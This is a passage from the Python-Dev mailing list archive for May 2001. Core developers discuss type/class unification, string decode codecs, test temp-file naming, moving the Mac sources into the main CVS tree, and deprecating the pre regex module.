> There is an implementation that is slowish if you use it, but has little
> cost if you don't: keep a big dict mapping object pointers to their
> associated dictionaries (if any). For purposes of discussion, call it
> sys._associations. Then have the getattr on "PyObject" look in this dict
> of dicts for attributes that it can't otherwise find, and setattr
> construct dictionaries in the dict of dicts if necessary.
> 
> That's the usual workaround anyhow so this would be a nicer syntax and a
> more orthogonal model.
> 
> Price: a hasattr that would return false or getattr that would raise
> AttributeError would be a little slower. They would have to check the
> dictionary of dictionaries before deciding that they really don't have
> the attribute.

Personally, if you want this outrageous implementation, you should be
paying for it, not the infrastructure.  It feels contrary to Python's
treatment of objects.  I don't like elaborate workarounds in the
implementation like this -- probably because the performance model
becomes muddy.

--Guido van Rossum (home page: http://www.python.org/~guido/)


From greg at cosc.canterbury.ac.nz  Fri May 11 03:05:11 2001
From: greg at cosc.canterbury.ac.nz (Greg Ewing)
Date: Fri, 11 May 2001 13:05:11 +1200 (NZST)
Subject: [Python-Dev] Type/class
In-Reply-To: <3AFB22A8.A0A6A4D4@ActiveState.com>
Message-ID: <200105110105.NAA17698@s454.cosc.canterbury.ac.nz>

Paul Prescod <paulp at ActiveState.com>:

> Otherwise
> they have null pointers that "act as if" they were empty
> dictionaries.

Actually, they need to act as if they were empty except for
a "__dict__" slot which contains another one of these magic
things. :-)

Greg Ewing, Computer Science Dept, +--------------------------------------+
University of Canterbury,	   | A citizen of NewZealandCorp, a	  |
Christchurch, New Zealand	   | wholly-owned subsidiary of USA Inc.  |
greg at cosc.canterbury.ac.nz	   +--------------------------------------+


From barry at digicool.com  Fri May 11 05:45:38 2001
From: barry at digicool.com (Barry A. Warsaw)
Date: Thu, 10 May 2001 23:45:38 -0400
Subject: [Python-Dev] Interview with Mark Lutz
Message-ID: <15099.24674.311472.184935@anthem.wooz.org>

Great interview with Mark on the ORA site, linked from /.

    http://python.oreilly.com/news/python_0501.html

-Barry


From fredrik at effbot.org  Fri May 11 07:57:34 2001
From: fredrik at effbot.org (Fredrik Lundh)
Date: Fri, 11 May 2001 07:57:34 +0200
Subject: [Python-Dev] Interview with Mark Lutz
References: <15099.24674.311472.184935@anthem.wooz.org>
Message-ID: <022d01c0d9eb$d3e3d680$e46940d5@hagrid>

barry wrote:

> Great interview with Mark on the ORA site, linked from /.
> 
>     http://python.oreilly.com/news/python_0501.html

you mean that python-devers read slashdot for python news,
when you have the daily url:

    http://www.pythonware.com/daily

Cheers /F


From thomas at xs4all.net  Fri May 11 11:02:26 2001
From: thomas at xs4all.net (Thomas Wouters)
Date: Fri, 11 May 2001 11:02:26 +0200
Subject: [Python-Dev] Re: test_mmap failing?
In-Reply-To: <15098.44151.714757.997613@cj42289-a.reston1.va.home.com>; from fdrake@acm.org on Thu, May 10, 2001 at 10:57:59AM -0400
References: <LNBBLJKPBEHFEDALKOLCKEEDKBAA.tim.one@home.com> <15098.44151.714757.997613@cj42289-a.reston1.va.home.com>
Message-ID: <20010511110226.M16486@xs4all.nl>

On Thu, May 10, 2001 at 10:57:59AM -0400, Fred L. Drake, Jr. wrote:

[ Fred violates Tim's Rule #1 (don't ever use 'foo' for anything) and gets
  bitten in the derriere ]

>   This begs the question, though -- should tests that create temp
> files check that the files don't already exist, and fail with a more
> descriptive error if they do?

I'd think so, yes. I'd also suggest that nothing use something as lamely named as
'foo', 'test' or 'spam' -- I'm sure Tim will agree with me, at least on the
first count :) How about mmap calling its test file 'test_mmap.foo'?
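A minimal sketch of both suggestions, assuming a test wants a fixed per-test file name. The helper names `fresh_testfile` and `unique_testfile` are hypothetical, not part of the regression-test framework. The second helper sidesteps collisions entirely by letting `tempfile.mkstemp()` choose the name.

```python
import os
import tempfile

TESTFN = "test_mmap.foo"  # a per-test name, as suggested above


def fresh_testfile(path=TESTFN):
    """Fail loudly if a stale file is in the way, rather than letting
    the test trip over it later with an obscure error."""
    if os.path.exists(path):
        raise RuntimeError(
            "test file %r already exists; a previous run may have left it "
            "behind, or another program is using that name" % path)
    return path


def unique_testfile(prefix="test_mmap_"):
    """Alternative: let tempfile pick a name that cannot collide."""
    fd, path = tempfile.mkstemp(prefix=prefix)
    os.close(fd)
    return path
```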

-- 
Thomas Wouters <thomas at xs4all.net>

Hi! I'm a .signature virus! copy me into your .signature file to help me spread!


From mal at lemburg.com  Fri May 11 11:34:25 2001
From: mal at lemburg.com (M.-A. Lemburg)
Date: Fri, 11 May 2001 11:34:25 +0200
Subject: [Python-Dev] "data".decode(encoding) ?!
References: <3AF04E3D.45AE4F4B@lemburg.com> <200105021918.OAA03080@cj20424-a.reston1.va.home.com> <3AF052CE.E928BDA1@lemburg.com> <200105021938.OAA03550@cj20424-a.reston1.va.home.com> <3AF0662D.48671B4E@lemburg.com> <m38zk6s2kl.fsf@atrus.jesus.cam.ac.uk>
Message-ID: <3AFBB221.F29BCB9A@lemburg.com>

Michael Hudson wrote:
> 
> "M.-A. Lemburg" <mal at lemburg.com> writes:
> 
> > I've attached the patch. Due to a small reorganisation the patch is
> > a little longer -- symmetry has its price at C level too ;-)
> 
> I may be being dense, but can you explain what's going on here:
> 
> ->> u'\u00e3'.encode('latin-1')
> '\xe3'
> ->> u'\u00e3'.encode("latin-1").decode("latin-1")
> Traceback (most recent call last):
>   File "<input>", line 1, in ?
> UnicodeError: ASCII encoding error: ordinal not in range(128)

The string.decode() method will try to reuse the Unicode
codecs here. To do this, it will have to convert the string
to Unicode first and this fails due to the character not being
in the ASCII range.

> Can you come up with some other example I can use in tomorrow's
> python-dev summary?

I will add some codecs which make the .decode() method useful
next week. The ones I have in mind are base64, hex and some of
the other binascii codecs. Also, the ROT13 codec I posted will
go into the core as a simple example.

With those you will be able to write:

data.encode('base64').decode('base64')

and get back data.
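For readers on a current Python, the same round trip is available as a sketch, though the spelling differs from the one proposed here. In Python 3, bytes objects have no .encode() method, so the bytes-to-bytes codecs (base64, hex) and the str-to-str rot_13 codec are reached through `codecs.encode()` and `codecs.decode()`:

```python
import codecs

data = b"some binary data"

# Python 3 reaches the bytes-to-bytes codecs through codecs.encode()
# and codecs.decode() rather than through methods on bytes/str.
encoded = codecs.encode(data, "base64")
roundtrip = codecs.decode(encoded, "base64")

# hex works the same way; rot_13 is a str-to-str codec.
hexed = codecs.encode(data, "hex")
rotated = codecs.encode("Hello", "rot_13")  # 'Uryyb'
```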

-- 
Marc-Andre Lemburg
______________________________________________________________________
Company & Consulting:                           http://www.egenix.com/
Python Software:                        http://www.lemburg.com/python/


From fredrik at effbot.org  Fri May 11 11:43:14 2001
From: fredrik at effbot.org (Fredrik Lundh)
Date: Fri, 11 May 2001 11:43:14 +0200
Subject: [Python-Dev] "data".decode(encoding) ?!
References: <3AF04E3D.45AE4F4B@lemburg.com> <200105021918.OAA03080@cj20424-a.reston1.va.home.com> <3AF052CE.E928BDA1@lemburg.com> <200105021938.OAA03550@cj20424-a.reston1.va.home.com> <3AF0662D.48671B4E@lemburg.com> <m38zk6s2kl.fsf@atrus.jesus.cam.ac.uk> <3AFBB221.F29BCB9A@lemburg.com>
Message-ID: <049801c0d9fe$cd98aef0$e46940d5@hagrid>

mal wrote:

> > I may be being dense, but can you explain what's going on here:
> > 
> > ->> u'\u00e3'.encode('latin-1')
> > '\xe3'
> > ->> u'\u00e3'.encode("latin-1").decode("latin-1")
> > Traceback (most recent call last):
> >   File "<input>", line 1, in ?
> > UnicodeError: ASCII encoding error: ordinal not in range(128)
> 
> The string.decode() method will try to reuse the Unicode
> codecs here. To do this, it will have to convert the string
> to Unicode first and this fails due to the character not being
> in the ASCII range.

can you take that again?  shouldn't michael's example be
equivalent to:

    unicode(u"\u00e3".encode("latin-1"), "latin-1")

if not, I'd argue that your "decode" design is broken, instead
of just buggy...

Cheers /F


From mal at lemburg.com  Fri May 11 11:50:24 2001
From: mal at lemburg.com (M.-A. Lemburg)
Date: Fri, 11 May 2001 11:50:24 +0200
Subject: [Python-Dev] Interview with Mark Lutz
References: <15099.24674.311472.184935@anthem.wooz.org> <022d01c0d9eb$d3e3d680$e46940d5@hagrid>
Message-ID: <3AFBB5E0.620710C8@lemburg.com>

Fredrik Lundh wrote:
> 
> barry wrote:
> 
> > Great interview with Mark on the ORA site, linked from /.
> >
> >     http://python.oreilly.com/news/python_0501.html
> 
> you mean that python-devers read slashdot for python news,
> when you have the daily url:
> 
>     http://www.pythonware.com/daily

I just bought one of those nice machines that can run pippy
and was wondering how to get AvantGo (the channel software that
comes with it) to synchronize with your daily URL... wouldn't it
be possible to set up a channel for this? The AvantGo channels
can be registered at their site (http://www.avantgo.com), but the
contents would have to be "mobile friendly"... anyway, just a 
thought ;-)

-- 
Marc-Andre Lemburg
______________________________________________________________________
Company & Consulting:                           http://www.egenix.com/
Python Software:                        http://www.lemburg.com/python/


From mal at lemburg.com  Fri May 11 12:07:40 2001
From: mal at lemburg.com (M.-A. Lemburg)
Date: Fri, 11 May 2001 12:07:40 +0200
Subject: [Python-Dev] "data".decode(encoding) ?!
References: <3AF04E3D.45AE4F4B@lemburg.com> <200105021918.OAA03080@cj20424-a.reston1.va.home.com> <3AF052CE.E928BDA1@lemburg.com> <200105021938.OAA03550@cj20424-a.reston1.va.home.com> <3AF0662D.48671B4E@lemburg.com> <m38zk6s2kl.fsf@atrus.jesus.cam.ac.uk> <3AFBB221.F29BCB9A@lemburg.com> <049801c0d9fe$cd98aef0$e46940d5@hagrid>
Message-ID: <3AFBB9EC.F75C158D@lemburg.com>

Fredrik Lundh wrote:
> 
> mal wrote:
> 
> > > I may be being dense, but can you explain what's going on here:
> > >
> > > ->> u'\u00e3'.encode('latin-1')
> > > '\xe3'
> > > ->> u'\u00e3'.encode("latin-1").decode("latin-1")
> > > Traceback (most recent call last):
> > >   File "<input>", line 1, in ?
> > > UnicodeError: ASCII encoding error: ordinal not in range(128)
> >
> > The string.decode() method will try to reuse the Unicode
> > codecs here. To do this, it will have to convert the string
> > to Unicode first and this fails due to the character not being
> > in the ASCII range.
> 
> can you take that again?  shouldn't michael's example be
> equivalent to:
> 
>     unicode(u"\u00e3".encode("latin-1"), "latin-1")
> 
> if not, I'd argue that your "decode" design is broken, instead
> of just buggy...

Well, it is sort of broken, I agree. The reason is that 
PyString_Encode() and PyString_Decode() guarantee the returned
object to be a string object. To be able to reuse Unicode codecs
I added code which converts Unicode back to a string in case the
codec returns a Unicode object (which the .decode() method does).
This is what's failing.

Perhaps I should simply remove the restriction and have both
APIs return the codec's return object as-is ?! (I would be in
favour of this, but I'm not sure whether this is already in use 
by someone...)
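The failure and the proposed fix can be modelled in a few lines of Python 3, where `bytes` plays the role of the 2.x 8-bit string and `str` the role of Unicode. Both function names are hypothetical. The first imitates the C API's "always return a string" coercion, which uses ASCII. The second returns the codec's result as-is. The resulting UnicodeEncodeError corresponds to the "ASCII encoding error" in Michael's traceback.

```python
import codecs


def decode_coercing(data, encoding):
    """Model of the 2.1 behaviour: force the codec result back into
    an 8-bit string using the default (ASCII) encoding."""
    result = codecs.decode(data, encoding)  # latin-1 returns text
    if isinstance(result, str):
        result = result.encode("ascii")     # the coercion step that fails
    return result


def decode_as_is(data, encoding):
    """The proposed fix: hand back whatever object the codec produced."""
    return codecs.decode(data, encoding)


raw = "\u00e3".encode("latin-1")  # b'\xe3'
print(decode_as_is(raw, "latin-1") == "\u00e3")  # True
```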

-- 
Marc-Andre Lemburg
______________________________________________________________________
Company & Consulting:                           http://www.egenix.com/
Python Software:                        http://www.lemburg.com/python/


From guido at digicool.com  Fri May 11 15:31:18 2001
From: guido at digicool.com (Guido van Rossum)
Date: Fri, 11 May 2001 08:31:18 -0500
Subject: [Python-Dev] Type/class
In-Reply-To: Your message of "Thu, 10 May 2001 20:57:36 EST."
             <200105110157.UAA03123@cj20424-a.reston1.va.home.com> 
References: <3AFB0E58.1F0ABCA6@ActiveState.com> <200105110003.TAA02924@cj20424-a.reston1.va.home.com> <3AFB31C3.5CEF9064@ActiveState.com>  
            <200105110157.UAA03123@cj20424-a.reston1.va.home.com> 
Message-ID: <200105111331.IAA04171@cj20424-a.reston1.va.home.com>

> > > Good point.  Plain old types currently (in the descr-branch) have a
> > > readonly dict (using a proxy) and no settable attributes.  I will
> > > probably give types settable attributes in a next revision, but I
> > > prefer not to make the type's dict writable -- I need to be able to
> > > watch the setattr calls so that if someone changes
> > > DictType.__getitem__ I can change the mp_subscript to a C function
> > > that calls the __getitem__ method.  

Alas, I think I'll have to withdraw this promise for now.  The truly
built-in types are static objects that are shared between all
interpreter instances within one process, and each type has only one
dictionary pointer.  So changes to the __dict__ would affect other
interpreter instances, and that's unacceptable.

I've thought about alternatives; I can't give each interpreter its own
set of types because sometimes objects are shared between interpreters
(e.g. the dictionary of interned strings), and then their types
have to be shared too!  Not having any object sharing would mean too
much of a change to the foundations of the implementation.

I think we'll have to live with this restriction until Python 3000.
Personally, I don't mind -- I see mostly possible abuses for the
ability to change attributes of e.g. DictType or StringType. :-)
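This restriction is still visible in CPython 3, sketched below under the assumption of a current interpreter. Assigning to an attribute of the static `dict` type raises TypeError. Assigning a special method on a Python-level subtype is allowed, and the interpreter updates the corresponding C slot, much as described above for DictType.__getitem__. `MyDict` and `doubled_getitem` are illustrative names only.

```python
def builtin_type_is_patchable():
    """Try to replace a method on the built-in dict type."""
    try:
        dict.__getitem__ = lambda self, key: None
    except TypeError:
        return False  # static built-in types reject attribute assignment
    return True


class MyDict(dict):
    pass


def doubled_getitem(self, key):
    return dict.__getitem__(self, key) * 2


# Assigning a special method on a subtype also updates the C-level
# slot, so subscripting picks up the new behaviour immediately.
MyDict.__getitem__ = doubled_getitem
d = MyDict(a=21)
print(d["a"])  # 42
```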

--Guido van Rossum (home page: http://www.python.org/~guido/)


From sdm7g at Virginia.EDU  Fri May 11 15:43:32 2001
From: sdm7g at Virginia.EDU (Steven D. Majewski)
Date: Fri, 11 May 2001 09:43:32 -0400 (EDT)
Subject: [Python-Dev] Type/class
In-Reply-To: <200105111331.IAA04171@cj20424-a.reston1.va.home.com>
Message-ID: <Pine.NXT.4.21.0105110919490.501-100000@localhost>


Catching up on this thread -- mostly because it looks like I'm
going to have to use ExtensionClass to make pyobjc classes into
python classes rather than types -- you can add that to the 
list of real-world uses of Don's Metaclass hack that Tim
questioned. 

 Reading up on MetaClasses in Smalltalk again makes me appreciate
the simplicity of a prototype system where everything is just
an object -- all objects can be cloned, and some objects are 
only used for cloning -- they are the exemplars of their type
which fill the role of Classes. 

 Unfortunately, although prototypes would be a lot simpler, it 
would be a pretty incompatible change for Python -- I can't think
of any way to get there without a lot of breakage. 

 (Still -- I wonder if there's a way they could be used under
the covers in the implementation to make it simpler. Prototype
semantics are basically a superset of Class based semantics, which
is how it was easy to do Smalltalk in Self.)

 Classes are necessary for statically typed O-O languages, but 
IMHO, make a lot less sense for dynamic languages. If Py3K were
to be a clean start, I'd urge basing it on prototypes, but as
an incremental creation -- I don't know how to get there from 
here (unless it could sneak in under the implementation covers!)
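To make "everything is just an object" concrete, here is a minimal prototype-style object in Python. It is a hypothetical illustration and does not model how Self or Python actually work. Each object has its own slots plus a parent slot. Failed lookups are delegated up the parent chain, and `clone()` makes a new object whose parent is the exemplar.

```python
class Proto:
    """Minimal prototype object: own slots plus a parent to delegate to."""

    def __init__(self, parent=None, **slots):
        self.__dict__["parent"] = parent
        self.__dict__.update(slots)

    def __getattr__(self, name):
        # Only called when normal lookup fails: ask the parent chain.
        parent = self.__dict__["parent"]
        if parent is None:
            raise AttributeError(name)
        return getattr(parent, name)

    def clone(self, **slots):
        # A clone holds only its overrides and delegates the rest.
        return Proto(parent=self, **slots)


point = Proto(x=0, y=0)  # exemplar playing the role of a class
p = point.clone(x=3)     # overrides x, inherits y
print(p.x, p.y)          # 3 0
point.y = 5              # delegation is live, not a copy
print(p.y)               # 5
```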


 BTW: XlispStat, which has a prototype object system with multiple
inheritance also doesn't have "super" -- there is a 
(call-next-method [ args... ]) function/macro which searches for
 the base classes. I'm sure there's a lower level function to 
 just get the next method, but typically, call-next-method is
 what's used. There is no search for non-method attributes, as
 all of the base class instance vars are merged and made into
 slots of the instance itself. (There are no class variables -- 
 there are no classes.) 

 The closest python equivalent would be, as has been discussed
in this thread, a super method or function that does attribute
 lookup on the bases. 
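As a point of comparison, and not something from this thread, the super() that Python eventually gained behaves much like call-next-method. Each call continues the search at the next class in the method resolution order, so a diamond of classes is visited once each. The class names below are illustrative.

```python
class Base:
    def describe(self):
        return ["Base"]


class Left(Base):
    def describe(self):
        # super() plays the role of (call-next-method): continue the
        # search at the next class in the MRO, not at a fixed base.
        return ["Left"] + super().describe()


class Right(Base):
    def describe(self):
        return ["Right"] + super().describe()


class Both(Left, Right):
    def describe(self):
        return ["Both"] + super().describe()


print(Both().describe())  # ['Both', 'Left', 'Right', 'Base']
```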


-- Steve Majewski


From nas at python.ca  Fri May 11 16:06:39 2001
From: nas at python.ca (Neil Schemenauer)
Date: Fri, 11 May 2001 07:06:39 -0700
Subject: [Python-Dev] Re: Change module attribute get & set
In-Reply-To: <E14yD4q-0001Au-00@usw-sf-web1.sourceforge.net>; from noreply@sourceforge.net on Fri, May 11, 2001 at 06:35:28AM -0700
References: <E14yD4q-0001Au-00@usw-sf-web1.sourceforge.net>
Message-ID: <20010511070639.A1402@glacier.fnational.com>

noreply at sourceforge.net wrote:
> Module objects currently don't define the tp_getattro 
> or tp_setattro slots.  As a result, interning of 
> attribute names does them no good:  a char* is always 
> passed, so the dict lookup always needs to do a string 
> compare despite that the attribute name is interned.

I think this is a problem in classobject.c:generic_binary_op as
well.  PyObject_GetAttrString is always used.  I believe the old
code interned names like "__add__" and used PyObject_GetAttr.  Is
it worth fixing this?
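A Python-level analogue of the issue is sketched below. At the C level in 2.x the usual remedy would be to intern "__add__" once, for example with PyString_InternFromString(), and pass that object to PyObject_GetAttr(). The sketch only shows the principle. Interning maps equal strings to a single object, so a dict lookup keyed on that object can succeed on an identity check before any character comparison. The variable names are illustrative.

```python
import sys

literal_name = "__add__"                     # compile-time constant
runtime_name = "".join(["__", "add", "__"])  # built at run time

# Equal strings may still be distinct objects; sys.intern() maps every
# equal string to one canonical object, so lookups keyed on interned
# names can match by identity instead of comparing characters.
canonical = sys.intern(runtime_name)
table = {sys.intern(literal_name): "add slot"}
print(table[canonical])  # add slot
```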

  Neil


From guido at digicool.com  Fri May 11 17:13:56 2001
From: guido at digicool.com (Guido van Rossum)
Date: Fri, 11 May 2001 10:13:56 -0500
Subject: [Python-Dev] Re: Change module attribute get & set
In-Reply-To: Your message of "Fri, 11 May 2001 07:06:39 MST."
             <20010511070639.A1402@glacier.fnational.com> 
References: <E14yD4q-0001Au-00@usw-sf-web1.sourceforge.net>  
            <20010511070639.A1402@glacier.fnational.com> 
Message-ID: <200105111513.KAA04872@cj20424-a.reston1.va.home.com>

> I think this is a problem in classobject.c:generic_binary_op as
> well.  PyObject_GetAttrString is always used.  I believe the old
> code interned names like "__add__" and used PyObject_GetAttr.  Is
> it worth fixing this?

Maybe.  I'd give this low priority.  If my descriptor branch work goes
well, most of classobject.c *may* disappear in favor of the newly
swollen typeobject.c. ;-)

--Guido van Rossum (home page: http://www.python.org/~guido/)


From jack at oratrix.nl  Fri May 11 16:29:24 2001
From: jack at oratrix.nl (Jack Jansen)
Date: Fri, 11 May 2001 16:29:24 +0200
Subject: [Python-Dev] Mac CVS repository moved to sourceforge
Message-ID: <20010511142924.C8037303181@snelboot.oratrix.nl>

Folks,
the Python/Mac repository has been moved to sourceforge, and is integrated 
with the general Python repository, so from now on a single CVS tree suffices 
to build MacPython.

I'm setting the old pythoncvs.oratrix.nl repository to readonly for a few more 
weeks and then it'll disappear.

Note that the pythoncvs.oratrix.nl repository is still the source for some of 
the optional libraries you need to build MacPython, but that's only if you 
want to build it completely from CVS.
--
Jack Jansen             | ++++ stop the execution of Mumia Abu-Jamal ++++
Jack.Jansen at oratrix.com | ++++ if you agree copy these lines to your sig ++++
www.oratrix.nl/~jack    | ++++ see http://www.xs4all.nl/~tank/ ++++


From martin at loewis.home.cs.tu-berlin.de  Fri May 11 16:41:33 2001
From: martin at loewis.home.cs.tu-berlin.de (Martin v. Loewis)
Date: Fri, 11 May 2001 16:41:33 +0200
Subject: [Python-Dev] Mac hierarchy backwards
Message-ID: <200105111441.f4BEfXS01559@mira.informatik.hu-berlin.de>

First, thanks to Jack Jansen for integrating the Mac sources; this is
a good thing.

It seems, however, that some of the directory structure is backwards:
Mac/Demo should be Demo/Mac, and Mac/Tools should be Tools/Mac. There
may be others of this kind.

I also wonder whether all these files are still needed, and meant to
be distributed. E.g. I see chdir.c having the comment

/* Chdir for the Macintosh.
   Public domain by Guido van Rossum, CWI, Amsterdam (July 1987).
   Pathnames must be Macintosh paths, with colons as separators. */

Is it really the case that the Mac API hasn't grown a chdir call in 13
years?

Regards,
Martin


From fdrake at acm.org  Fri May 11 16:55:33 2001
From: fdrake at acm.org (Fred L. Drake, Jr.)
Date: Fri, 11 May 2001 10:55:33 -0400 (EDT)
Subject: [Python-Dev] Mac hierarchy backwards
In-Reply-To: <200105111441.f4BEfXS01559@mira.informatik.hu-berlin.de>
References: <200105111441.f4BEfXS01559@mira.informatik.hu-berlin.de>
Message-ID: <15099.64869.626588.775895@cj42289-a.reston1.va.home.com>

Martin v. Loewis writes:
 > It seems, however, that some of the directory structure is backwards:
 > Mac/Demo should be Demo/Mac, and Mac/Tools should be Tools/Mac. There
 > may be others of this kind.

  I agree that this should be the goal; I don't know if Jack's release
procedure would need to be revised before that can happen.  If so, I'd
encourage him to do so.

 > Is it really the case that the Mac API hasn't grown a chdir call in 13
 > years?

  Yikes!  I just searched developer.apple.com for "chdir" and came up
with no hits, but I really don't know just what that tells me.
chdir() is required for POSIX compliance, but it isn't mentioned in
the C9X final committee draft.


  -Fred

-- 
Fred L. Drake, Jr.  <fdrake at acm.org>
PythonLabs at Digital Creations


From jack at oratrix.nl  Fri May 11 16:56:39 2001
From: jack at oratrix.nl (Jack Jansen)
Date: Fri, 11 May 2001 16:56:39 +0200
Subject: [Python-Dev] Mac hierarchy backwards 
In-Reply-To: Message by "Martin v. Loewis" <martin@loewis.home.cs.tu-berlin.de>,
	     Fri, 11 May 2001 16:41:33 +0200, <200105111441.f4BEfXS01559@mira.informatik.hu-berlin.de> 
Message-ID: <20010511145640.9FCB5303181@snelboot.oratrix.nl>

> It seems, however, that some of the directory structure is backwards:
> Mac/Demo should be Demo/Mac, and Mac/Tools should be Tools/Mac. There
> may be others of this kind.

Yes, now that the Mac stuff is integrated with the mainstream again this might 
be a good idea.

> I also wonder whether all these files are still needed, and meant to
> be distributed. E.g. I see chdir.c having the comment
> 
> /* Chdir for the Macintosh.
>    Public domain by Guido van Rossum, CWI, Amsterdam (July 1987).
>    Pathnames must be Macintosh paths, with colons as separators. */
> 
> Is it really the case that the Mac API hasn't grown a chdir call in 13
> years?

Hmm, hmm, I'm unsure.

MacOS (<= 9) itself doesn't have chdir, because it doesn't believe in current 
directories (by design. Whether I agree with the design is a different 
matter:-).

Normally MacPython is built with a special unix-compatibility library, GUSI, 
which does provide these calls. However, it is still possible to build without 
GUSI, and actually in the process of porting MacPython to Carbon ("MacOSX in 
its MacOS API model") I've used these compatibility routines again, until I 
finally got GUSI ported.

But it's easy enough to cvs-remove them from the normal tree, to be revived 
when needed. What do people think?
--
Jack Jansen             | ++++ stop the execution of Mumia Abu-Jamal ++++
Jack.Jansen at oratrix.com | ++++ if you agree copy these lines to your sig ++++
www.oratrix.nl/~jack    | see http://www.xs4all.nl/~tank/spg-l/sigaction.htm 


From pedroni at inf.ethz.ch  Fri May 11 16:56:48 2001
From: pedroni at inf.ethz.ch (Samuele Pedroni)
Date: Fri, 11 May 2001 16:56:48 +0200 (MET DST)
Subject: [Python-Dev] Type/class
Message-ID: <200105111456.QAA00228@core.inf.ethz.ch>

Hi.

> 
>  Reading up on MetaClasses in Smalltalk again makes me appreciate
> the simplicity of a prototype system where everything is just
> an object -- all objects can be cloned, and some objects are 
> only used for cloning -- they are the exemplars of their type
> which fill the role of Classes. 
> 
I agree. I often read that Smalltalk is "simple" up to metaclasses;
on the other hand, the casual user can just ignore them.

>  Unfortunately, although prototypes would be a lot simpler, it 
> would be a pretty incompatible change for Python -- I can't think
> of any way to get there without a lot of breakage. 
> 
>  (Still -- I wonder if there's a way they could be used under
> the covers in the implementation to make it simpler. Prototype
> semantics are basically a superset of Class based semantics, which
> is how it was easy to do Smalltalk in Self.)
> 
[Ignoring the fact that code and changes require coders]

Thinking in terms of proto-objects, parent slots and list parent slots:

python instance I has data slots and a parent slot __class__,

python class C has data slots and a list parent slot __bases__,

then we have the python rules (not very uniform):
function from I directly => function
function from I.__class__ => bound method
function from C => unbound method

That's the difficult part for every model that aims to remain compatible.
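The three rules can be checked directly, with one caveat. The sketch assumes Python 3, which dropped unbound methods, so the third rule now yields a plain function instead. Class and attribute names are illustrative.

```python
class C:
    def method(self):
        return "from the class"


i = C()
i.func = lambda: "from the instance"  # function stored in i.__dict__

print(type(i.func).__name__)    # function: found in the instance itself
print(type(i.method).__name__)  # method: found via i.__class__, bound to i
print(type(C.method).__name__)  # function: Python 3 has no unbound methods
```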

Samuele Pedroni.


From thomas.heller at ion-tof.com  Fri May 11 17:40:10 2001
From: thomas.heller at ion-tof.com (Thomas Heller)
Date: Fri, 11 May 2001 17:40:10 +0200
Subject: [Python-Dev] Type/class
References: <Pine.NXT.4.21.0105110919490.501-100000@localhost>
Message-ID: <016d01c0da30$a99a9720$e000a8c0@thomasnotebook>

>  Reading up on MetaClasses in Smalltalk again makes me appreciate
> the simplicity of a prototype system where everything is just
> an object -- all objects can be cloned, and some objects are 
> only used for cloning -- they are the exemplars of their type
> which fill the role of Classes. 
> 
>  Unfortunately, although prototypes would be a lot simpler, it 
> would be a pretty incompatible change for Python -- I can't think
> of any way to get there without a lot of breakage. 
> 
>  (Still -- I wonder if there's a way they could be used under
> the covers in the implementation to make it simpler. Prototype
> semantics are basically a superset of Class based semantics, which
> is how it was easy to do Smalltalk in Self.)

I never looked at Self or other prototype based systems.
Is it really true that prototypes are a lot simpler than
metaclasses, but on the other hand more powerful?

The 'brain exploding properties' of metaclasses are IMO
only there because my brain cannot think easily in too
many recursion steps...

Thomas


From fdrake at acm.org  Fri May 11 18:25:54 2001
From: fdrake at acm.org (Fred L. Drake, Jr.)
Date: Fri, 11 May 2001 12:25:54 -0400 (EDT)
Subject: [Python-Dev] status of pre?
Message-ID: <15100.4754.950053.844678@cj42289-a.reston1.va.home.com>

  Have we formulated a plan of action regarding PCRE and the pre
module?  Are we planning to leave them in for another version, or is
SRE considered sufficiently stable?


  -Fred

-- 
Fred L. Drake, Jr.  <fdrake at acm.org>
PythonLabs at Digital Creations


From sdm7g at Virginia.EDU  Fri May 11 18:29:30 2001
From: sdm7g at Virginia.EDU (Steven D. Majewski)
Date: Fri, 11 May 2001 12:29:30 -0400 (EDT)
Subject: [Python-Dev] Mac hierarchy backwards
In-Reply-To: <15099.64869.626588.775895@cj42289-a.reston1.va.home.com>
Message-ID: <Pine.NXT.4.21.0105111130290.234-100000@localhost.virginia.edu>


On Fri, 11 May 2001, Fred L. Drake, Jr. wrote:
> 
> Martin v. Loewis writes:
>  > Is it really the case that the Mac API hasn't grown a chdir call in 13
>  > years?
> 
>   Yikes!  I just searched developer.apple.com for "chdir" and came up
> with no hits, but I really don't know just what that tells me.
> chdir() is required for POSIX compliance, but it isn't mentioned in
> the C9X final committee draft.


 There isn't a chdir in any of the pre-OSX Mac *system* libraries, and
Mac has never claimed any POSIX compliance (even with OSX, they have
officially said it's almost certainly POSIX compliant but they have
no plans for now to go through the hoops and paperwork to get it 
certified.) 

 chdir is in unistd.h, which isn't part of the standard C library.

 However, Metrowerks *compiler* and IDE for the Mac does include in
MSL (Metrowerks Standard Library) a unistd.[hc] with chdir. ( MW 
selling development tools obviously has more interest in being 
POSIX compliant than Apple! )


 I don't know if there's one in the MPW libraries, so maybe you
still want to leave it there. 

 -- Steve Majewski


From guido at digicool.com  Fri May 11 20:47:38 2001
From: guido at digicool.com (Guido van Rossum)
Date: Fri, 11 May 2001 13:47:38 -0500
Subject: [Python-Dev] status of pre?
In-Reply-To: Your message of "Fri, 11 May 2001 12:25:54 -0400."
             <15100.4754.950053.844678@cj42289-a.reston1.va.home.com> 
References: <15100.4754.950053.844678@cj42289-a.reston1.va.home.com> 
Message-ID: <200105111847.NAA05835@cj20424-a.reston1.va.home.com>

>   Have we formulated a plan of action regarding PCRE and the pre
> module?  Are we planning to leave them in for another version, or is
> SRE considered sufficiently stable?

Hm.  It should disappear but I believe I've heard people say they were
forced to use it because of the recursion limit problems with SRE on
some platforms.

We could put a warning on using pre or pcre in 2.2, and remove it in
2.3, hoping that /F fixes the recursion limit problems in the meantime
(weren't those related to the backtracking implementation?).
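The "warn in 2.2, remove in 2.3" step could look roughly like the sketch below, placed at the top of the deprecated module. The helper name `warn_deprecated_module` is hypothetical. `stacklevel=2` makes the warning point at the caller of the helper rather than at the helper itself.

```python
import warnings


def warn_deprecated_module(name, replacement):
    """Hypothetical helper a deprecated module (e.g. pre.py) could call
    at import time."""
    warnings.warn(
        "the %s module is deprecated; use %s instead" % (name, replacement),
        DeprecationWarning,
        stacklevel=2,
    )


# At the top of pre.py one would then write:
# warn_deprecated_module("pre", "re")
```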

--Guido van Rossum (home page: http://www.python.org/~guido/)


From skip at pobox.com  Fri May 11 22:41:30 2001
From: skip at pobox.com (skip at pobox.com)
Date: Fri, 11 May 2001 15:41:30 -0500
Subject: [Python-Dev] GC and ExtensionClass
Message-ID: <15100.20090.573866.569667@beluga.mojam.com>

Has anyone investigated interactions between ExtensionClass objects and GC?
I've encountered segfaults with 2.1 in certain situations when using the
latest PyGtk stuff.  The gdb traceback (appended) sort of suggests the two
intersect somewhere.  PyGtk provides a Python interface to the Gtk widget
